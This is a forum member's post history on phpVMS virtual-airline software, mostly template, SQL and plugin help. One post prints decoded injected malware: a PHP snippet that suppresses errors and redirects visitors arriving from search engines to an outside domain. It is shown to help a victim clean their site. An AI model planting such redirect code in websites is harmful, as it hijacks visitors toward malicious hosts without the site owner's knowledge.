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Everything posted by Tom

  1. <?php Template::Show('main_menu.tpl'); ?> would likely work better. Also; 1) Move all the code as well as containing elements into frontpage_main.tpl (<div class="mc01"> in layout.tpl) 2) Find the second instance of <?php Template::Show('core_navigation.tpl'); ?> (lines 229-233 ()) and get rid of it. Replace with other links you want, using the examples below it (Awards & Ranks)
  2. Skin phpVMS to look like the rest of your site; easiest way.
  3. Tom

    2nd Attack

    Meh I was just being honest in my opinion. I've known people who did things like this - it was never a case of wanting to attack someone, only being able to.
  4. Tom

    2nd Attack

    Or more likely, you didn't clear everything up. If you have all the files you use saved locally (which you should), just delete everything and reupload...
  5. Tom

    VAForum 2

    Oh yeah I'll be putting pages in. I'm going to be using this module on another site of mine which requires a more phpbb-ish forum, so I'll be adding all the things that make it easier to use and so on.
  6. Tom

    VAForum 2

    Ok, duly noted I have a few things I need to iron out, there are a few things that don't actually work properly but nobody seems to have noticed as of yet!
  7. I changed nothing, just deleted them before they could do anything. Not had any since...
  8. Tom

    change ID

    I've been using it for quite some time for various things. All it does is reset the next auto increment number to current highest + 1. Not had any adverse effects yet...
  9. It's in your servers php configuration... I'll make sure in the next revision I use <?php...
  10. Do you have short/asp style tags enabled? That's the problem..
  11. Blue & Green don't really look nice together :/
  12. Tom

    change ID

    After deleting pilots, go into your phpmyadmin and run SQL: ALTER TABLE phpvms_pilots AUTO_INCREMENT = 1 Or whatever your table prefix is.
  13. Which version of VAForum are you using? What is the error you get?
  14. Out of interest regarding fivedev, is the price shown (£6.68) including tax etc? Will that be the number leaving my account?
  15. Similar to the index function you just create another, for example: public function beer($var){ //do stuff with $var } would look like yoursite.com/index.php/beer/var To remember things you can use sessions.
  16. Tom

    HubStats Class

    Check your capitalisation too. In your quote it's looking for HubStats::countflights(), and it should be HubStats::CountFlights().
  17. You can't put php in pages from the admin panel.
  18. Tom

    HubStats Class

    >.< Forgot people don't always have <? set... seriouslyyyyyy web hosts, get on it. Glad everyone likes it, and damn Kyle it seems I neglected to add something if there are 0 records. My bad. If it's a problem let me know and I'll throw something together.
  19. In your cpanel/alternative, go to your phpmyadmin/other database management tool and navigate through to your phpVMS schedules table. There will be an "Empty" button or something similar. If you hit that it will basically remove all records from the table (and here's where it'll mess with the filed PIREPs because they have links and data based on these records). I don't know if resetting your auto increment is advised but I don't seem to have any problems doing it. If you want to, you'll have the option to run SQL somewhere. Run "ALTER TABLE phpvms_schedules AUTO_INCREMENT = 1" (without the quote marks and where phpvms_schedules is your schedules table should the prefix be different).
  20. It will mess with your filed pireps, but you can probably just drop the schedules table and reset your auto increment.
  21. Tom

    HubStats Class

    You place the file in the core/common/ folder Then to use the data, add the code to your template, for example: <? echo HubStats::CountPilots('EGKK'); ?> Will display a number on the page. For something like Pilots or FlightsDetails: <? $pilots = HubStats::Pilots('CYYC'); foreach($pilots as $pilot){ echo 'Name: '.$pilot->firstname.', '; } ?> Will display "Name: John, Bill, Bob" and so on. Obviously you can change this to use any of the fields you want.
  22. Tom

    Hub Stats

    http://forum.phpvms.net/topic/4437-hubstats-class/ here y'arr
  23. Tom

    HubStats Class

    To display various stats per hub: Readme + File available on GitHub: https://github.com/t...erritt/HubStats I think that pretty much covers everything? Enjoy
  24. Tom

    Mal ware

    Roger I decoded the base 64. That is the code it's adding into your pages. Seeing as I don't believe phpVMS uses any base 64 you should remove EVERY instance of it.
  25. Tom

    Mal ware

    Decoded as follows error_reporting(0); $nccv=headers_sent(); if (!$nccv){ $referer=$_SERVER['HTTP_REFERER']; $ua=$_SERVER['HTTP_USER_AGENT']; if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) { if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: http://fghhghfs6fg.osa.pl/"); exit(); } } }
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